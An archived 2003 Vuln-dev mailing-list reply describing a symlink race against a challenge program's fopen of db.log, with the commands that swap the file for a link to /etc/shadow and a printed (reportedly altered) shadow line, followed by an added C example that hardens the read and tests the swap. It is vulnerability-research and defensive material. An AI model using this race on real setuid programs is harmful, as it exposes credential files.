Re: [Vuln-dev Challenge] Challenge #2

From: Thomas Cannon (tcannonat_private)
Date: Fri May 23 2003 - 16:48:08 PDT

    > 
    >         /* read log */
    >         if ( (f1 = fopen("db.log", "r")) == NULL)
    >                 return 1;
    >         if (fgets(bfp, BFSIZE, f1) == NULL)
    >                 return 1;
    > 
    
    ...and if db.log is perhaps a symlink to /etc/shadow?
    
    I assumed the program would be chown'd to root, and set 4755. If this is an
    invalid assumption, well, no point in reading any further.
    
    I compiled the program, stopped it after it wrote the input log, made a
    symlink, and resumed running the program, with lovely results:
    
    [tcannon@needle]$ rm db.log
    [tcannon@needle]$ ln -s /etc/shadow db.log
    [tcannon@needle]$ fg
    ./a.out a a
    root:$1$TlFzTwuXXX.yj55Gy2RVfUd8dSDAE/:11955:0:99999:7:::
    
    I like race conditions. No point in wasting your CPU -- that shadowed
    password did get modified before I sent it to the list :-)
    
    Cheers,
    
    --tcannon
    
    PS: Nice strcpy
    
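A defensive counterpart to the quoted fopen("db.log", "r"), added here as an example and not part of the original post or the challenge program: it refuses to follow a symlink, validates the descriptor it actually opened rather than the path, and then replays the rm/ln -s swap from the post in a throwaway directory to show the read being rejected. The function names, the temp-directory prefix and the stand-in "secret" file are my own choices.

```c
#define _GNU_SOURCE 1            /* O_NOFOLLOW, O_CLOEXEC, mkdtemp */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hardened counterpart of the challenge's fopen("db.log", "r"). O_NOFOLLOW makes the
 * kernel refuse a symlink at the final component; the checks run on the descriptor we
 * got (fstat), not on the path, since a second stat() would reopen the race. */
int open_log_nofollow(const char *path, uid_t expected_owner)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;                  /* ELOOP when db.log is a symlink */
    struct stat st;
    if (fstat(fd, &st) < 0) { close(fd); return -1; }
    /* A hard link to /etc/shadow would pass O_NOFOLLOW; owner and link count catch it. */
    if (!S_ISREG(st.st_mode) || st.st_nlink != 1 || st.st_uid != expected_owner) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Replays the post's sequence in a throwaway directory (constructed scenario): the
 * genuine db.log opens, then "rm db.log; ln -s target db.log" is refused (ELOOP). */
int demo_symlink_swap(void)
{
    char dir[] = "/tmp/vulndev2.XXXXXX", logpath[256], target[256];
    if (mkdtemp(dir) == NULL) return 1;
    snprintf(logpath, sizeof logpath, "%s/db.log", dir);
    snprintf(target, sizeof target, "%s/secret", dir);   /* stands in for /etc/shadow */
    int rc = 2, fd;
    if ((fd = open(logpath, O_WRONLY | O_CREAT, 0600)) >= 0 && close(fd) == 0 &&
        (fd = open(target, O_WRONLY | O_CREAT, 0600)) >= 0 && close(fd) == 0 &&
        (fd = open_log_nofollow(logpath, getuid())) >= 0) {   /* genuine file: allowed */
        close(fd);
        rc = 3;
        if (unlink(logpath) == 0 && symlink(target, logpath) == 0) {  /* the attacker's move */
            fd = open_log_nofollow(logpath, getuid());
            rc = (fd < 0 && errno == ELOOP) ? 0 : 4;   /* 0: symlink swap rejected */
            if (fd >= 0) close(fd);
        }
    }
    unlink(logpath); unlink(target); rmdir(dir);
    return rc;
}
```

Note that the setuid program must also not create or write db.log in a directory other users can write to; refusing symlinks on the read side narrows the race but does not replace a privately owned log directory.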



    This archive was generated by hypermail 2b30 : Sat May 24 2003 - 10:39:30 PDT